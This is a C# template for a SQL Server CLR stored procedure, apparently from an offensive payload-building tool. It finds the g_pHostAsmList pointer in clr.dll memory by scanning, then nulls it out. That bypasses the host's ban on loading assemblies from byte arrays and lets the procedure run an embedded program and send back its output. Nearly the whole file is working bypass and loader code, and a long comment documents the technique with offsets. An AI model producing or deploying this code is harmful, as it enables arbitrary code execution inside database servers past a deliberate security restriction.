{% extends "ek47.cs.template" %}

{% block imports %}
using Microsoft.SqlServer.Server;
using System.Runtime.InteropServices;
using System.Diagnostics;
{% endblock %}

{% block newclass %}
public partial class StoredProcedures
{
    [StructLayout(LayoutKind.Sequential)]
    public struct MEMORY_BASIC_INFORMATION
    {
        public IntPtr BaseAddress;
        public IntPtr AllocationBase;
        public uint AllocationProtect;
        public IntPtr RegionSize;
        public uint State;
        public uint Protect;
        public uint Type;
    }
    struct RwRegion
    {
        public IntPtr Location;
        public IntPtr Size;
        public RwRegion(IntPtr location, IntPtr size)
        {
            Location = location;
            Size = size;
        }
    }
    public struct HostAsmList
    {
        public IntPtr ClrFnPtr;
        public IntPtr Garbage;
        public UInt64 CheckFlag;
    }

    const uint PAGE_READWRITE = 0x04;

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool VirtualQueryEx(IntPtr hProcess, IntPtr lpAddress, out MEMORY_BASIC_INFORMATION lpBuffer, uint dwLength);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool IsBadReadPtr(IntPtr ptr, uint size);

    private static RwRegion[] FindRwRegion(ProcessModule DllModule)
    {
        List<RwRegion> regions = new List<RwRegion>();

        Process currentProcess = Process.GetCurrentProcess();
        IntPtr moduleBaseAddress = DllModule.BaseAddress;
        IntPtr currentAddress = moduleBaseAddress;
        long moduleSize = DllModule.ModuleMemorySize;

        while ((long)currentAddress < (long)moduleBaseAddress + moduleSize)
        {
            MEMORY_BASIC_INFORMATION mbi = new MEMORY_BASIC_INFORMATION();
            if (!VirtualQueryEx(currentProcess.Handle, currentAddress, out mbi, (uint)Marshal.SizeOf(mbi)))
            {
                break;
            }

            currentAddress = (IntPtr)((long)mbi.BaseAddress + (long)mbi.RegionSize);
            if (mbi.Protect == PAGE_READWRITE)
            {
                regions.Add(new RwRegion(mbi.BaseAddress, mbi.RegionSize));
            }
        }
        return regions.ToArray();
    }

    static IntPtr ScanModuleRegions(RwRegion[] Regions, ProcessModule Module)
    {
        int FindCount = 0;
        IntPtr RetVal = IntPtr.Zero;
        ulong ModuleStartAddress = (ulong)Module.BaseAddress;
        ulong ModuleEndAddress = (ulong)Module.BaseAddress + (ulong)Module.ModuleMemorySize;
        ulong i = 0;
        foreach (RwRegion region in Regions)
        {
            i = (ulong)region.Location;
            while (i < (ulong)region.Location + (ulong)region.Size)
            {
                IntPtr temp_ptr = (IntPtr)i;
                if (!IsBadReadPtr(temp_ptr, (uint)IntPtr.Size))
                {
                    IntPtr pAsmList_maybe = (IntPtr)Marshal.PtrToStructure(temp_ptr, typeof(IntPtr));
                    if (!IsBadReadPtr(pAsmList_maybe, (uint)24))
                    {
                        HostAsmList TestValidStruct;
                        try
                        {
                            TestValidStruct = (HostAsmList)Marshal.PtrToStructure(pAsmList_maybe, typeof(HostAsmList));
                        }
                        catch (Exception e)
                        {
                            SqlContext.Pipe.Send("Could not marshal ptr to struct!");
                            break;
                        }
                        if ((ulong)TestValidStruct.ClrFnPtr > ModuleStartAddress && (ulong)TestValidStruct.ClrFnPtr < ModuleEndAddress)
                        {
                            if (TestValidStruct.CheckFlag == 0x53)
                            {
                                FindCount++;
                                RetVal = temp_ptr;
                            }
                        }
                    }

                }
                i += 4;
            }
        }
        if (FindCount > 1)
        {
            SqlContext.Pipe.Send("More than one struct found. This is not supposed to happen.");
            RetVal = IntPtr.Zero;
        }
        return RetVal;
    }

    private static IntPtr FindHostAsmList()
    {
        Process currentProcess = Process.GetCurrentProcess();
        IntPtr g_pHostAsmList = IntPtr.Zero;

        foreach (ProcessModule module in currentProcess.Modules)
        {
            if (module.ModuleName == "clr.dll")
            {
                RwRegion[] regions = FindRwRegion(module);
                g_pHostAsmList = ScanModuleRegions(regions, module);
                break;
            }
            // Find RW Regions of clr.dll
        }
        return g_pHostAsmList;
    }

    private static byte[] Read(IntPtr somePlaceInMem, int length = 0)
    {
        List<byte> bytes = new List<byte>();
        for (int i = 0; i < length; i++)
        {
            bytes.Add(Marshal.ReadByte(somePlaceInMem, i));
        }
        return bytes.ToArray();
    }

    private static bool EnableClrLoad()
    {
        /* Perform byte patching to bypass the clr!CorHost2::IsLoadFromBlocked function.
        // Without this patch, we run into the following dotnet exception:
        //
        // System.IO.FileLoadException: LoadFrom(), LoadFile(), Load(byte[]) and LoadModule() have been disabled by the host. 
        //    at System.Reflection.RuntimeAssembly.nLoadImage(Byte[] rawAssembly, Byte[] rawSymbolStore, Evidence evidence, StackCrawlMark& stackMark,
        //       Boolean fIntrospection, Boolean fSkipIntegrityCheck, SecurityContextSource securityContextSource)                 
        //    at System.Reflection.Assembly.Load(Byte[] rawAssembly) 
        //    at Program.Invoke(Byte[] asm, String[] args, String Method)
        //
        // Microsoft specifies UNSAFE assemblies (the least restrictive permission we can set) are not allowed to load dotnet assemblies from byte arrays:
        // "
        // UNSAFE
        // Loading an assembly-either explicitly by calling the System.Reflection.Assembly.Load() method from a byte array,
        // or implicitly through the use of Reflection.Emit namespace-is not permitted.
        // "
        // From: https://learn.microsoft.com/en-us/sql/relational-databases/clr-integration/database-objects/clr-integration-programming-model-restrictions
        //
        // The managed Assembly.Load(byte[]) function first calls RuntimeAssembly.nLoadImage() which is a CLR internal function (InternalCall).
        // nLoadImage() is defined in clr.dll as the C++ function as clr!AssemblyNative::LoadImage.
        // From: https://exploitmonday.blogspot.com/2013/11/ReverseEngineeringInternalCallMethods.html
        //
        // The clr!AssemblyNative::LoadImage function calls clr!CorHost2::IsLoadFromBlocked which returns 1 if assembly loading is blocked, otherwise 0.
        // A disassembled representation of clr!CorHost2::IsLoadFromBlocked is the following:
        //
        // int32_t CorHost2::IsLoadFromBlocked()
        // {
        //     if (g_bFusionHosted != 0 && g_pHostAsmList != 0)
        //     {
        //         return 1; // CLR does not load the assembly
        //     }
        //     return 0; // CLR loads the assembly
        // }
        //
        // An old version of CorHost2::IsLoadFromBlocked is defined here: https://github.com/lewischeng-ms/sscli/blob/master/clr/src/vm/corhost.cpp#L2583-L2587
        // Additionally, this blog post talks about tampering with the values in CorHost2::IsLoadFromBlocked: https://ikriv.com/blog/?p=16
        //
        // A simple way of allowing assemblies to be loaded is to force g_pHostAsmList to be 0.
        // We do not change g_bFusionHosted because it is used further in the loading process and tampering it prevents additional assemblies from being loaded.
        // Note: g_pHostAsmList does cause null reference exceptions, but SQL server seems to catch these without issue.
        //
        // Steps to find the global variable g_pHostAsmList inside of sqlservr.exe:
        //  - Get a handle to the base of clr.dll
        //  - Find the size of the clr.dll memory space
        //  - Calculate the start and end address of clr.dll memory space
        //  - Find the rw sections inside of clr.dll
        //  - Search the all rw sections and check if each blob of data is a valid pointer
        //  - If pointer is valid, check if the pointer points to clr.dll memory space
        //  - If previous conditions are true, check 16 byte offset from pointer for magic value 00000000`00000053
        //  - If we have a single match, we've found g_bFusionHosted
        //
        // Original offsets based on Server 2019 (1809 - OS Build 17763.1)
        // C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll (sha256sum: bfa6c7dbd12bfb5a436a18716a2fd8a5462884cf1793ee8d56b5f3cd44196db1)
        //
        // (x64 only patch for now)
        // offset 00000000`0094f770 = g_pHostAsmList
        // offset 00000000`0094e7b8 = g_bFusionHosted
        */

	IntPtr g_pHostAsmList = FindHostAsmList();
	if (g_pHostAsmList == IntPtr.Zero)
	{
	    SqlContext.Pipe.Send("Unable to find HostAsmList struct. Attempting to continue anyway.");
            return true;
	}
	SqlContext.Pipe.Send("Found HostAsmList struct!");
        byte[] Zero = new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };

        // Fetch original g_pHostAsmList bytes to patch back later. TODO: implement patch restore
        byte[] Original = Read(g_pHostAsmList, Zero.Length);

        // Null out g_pHostAsmList
        Marshal.Copy(Zero, 0, g_pHostAsmList, Zero.Length);

        // Check to make sure new bytes have successfully been written to g_pHostAsmList
        byte[] Updated = Read(g_pHostAsmList, Zero.Length);
        if (Updated.AsQueryable().SequenceEqual<byte>(Zero))
        {
            return true;
        }
        return false;
    }

    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void Run()
    {
        SqlContext.Pipe.Send("Starting up");

        if(!EnableClrLoad())
        {
            SqlContext.Pipe.Send("EnableClrLoad function returned false!");
            return;
        }

        //Redirect output from C# assembly (such as Console.WriteLine()) to a variable instead of screen
        TextWriter prevConOut = Console.Out;
        var sw = new StringWriter();
        Console.SetOut(sw);

        string[] args = { };
        Program.StartApplication(args);

        //Restore output -- Stops redirecting output
        Console.SetOut(prevConOut);
        string strOutput = sw.ToString();

        // SQL stored proceedures are only allowed to output a maximum of 4000 characters at a time
        // https://www.codeproject.com/articles/604341/howplustoplussendplusmoreplusthanplus4000pluschara
        // We need to check the size of strOutput and chunk it up if it is too big
        for (int i = 0; i < strOutput.Length; i += 4000)
        {
            int chunkLength = Math.Min(4000, strOutput.Length - i);
            string chunk = strOutput.Substring(i, chunkLength);
            SqlContext.Pipe.Send(chunk);
        }
        SqlContext.Pipe.Send("Complete!");
    }
}
{% endblock %}
